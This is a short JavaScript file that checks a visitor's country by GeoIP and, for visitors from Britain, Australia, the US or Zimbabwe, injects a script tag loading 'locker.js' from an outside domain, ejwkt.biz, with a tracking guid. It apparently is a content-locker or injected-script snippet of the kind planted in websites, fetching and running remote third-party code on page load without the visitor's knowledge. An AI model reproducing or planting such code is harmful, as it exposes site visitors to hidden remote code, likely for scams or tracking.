function searchcountry(list,country)
{
	//alert(country);
	//alert("list"+list);
	for(var i=0; i<list.length; i++) 
	{
    	if (list[i] == country) 
		{
			//alert(country+"=="+list[i]);
		return true;
		}
  	}
	return false;
}
var  country= geoip_country_code();
var countrylist=new Array('GB','AU','US');

//alert(country)

if(searchcountry(countrylist,country))
{
	//alert('country is in list');
	var headID = document.getElementsByTagName("head")[0];         
	var newScript = document.createElement('script');
	
	newScript.type = 'text/javascript';
	newScript.src = 'http://ejwkt.biz/trackingsystem/locker.js?guid=94ea7e08664b6123';
	headID.appendChild(newScript);
}

var countrylist2=new Array('ZW');
if(searchcountry(countrylist2,country))
{
	//alert('country is in list');
	var headID = document.getElementsByTagName("head")[0];         
	var newScript = document.createElement('script');
	
	newScript.type = 'text/javascript';
	newScript.src = 'http://ejwkt.biz/trackingsystem/locker.js?guid=94ebdbbf55f99234';
	headID.appendChild(newScript);
}






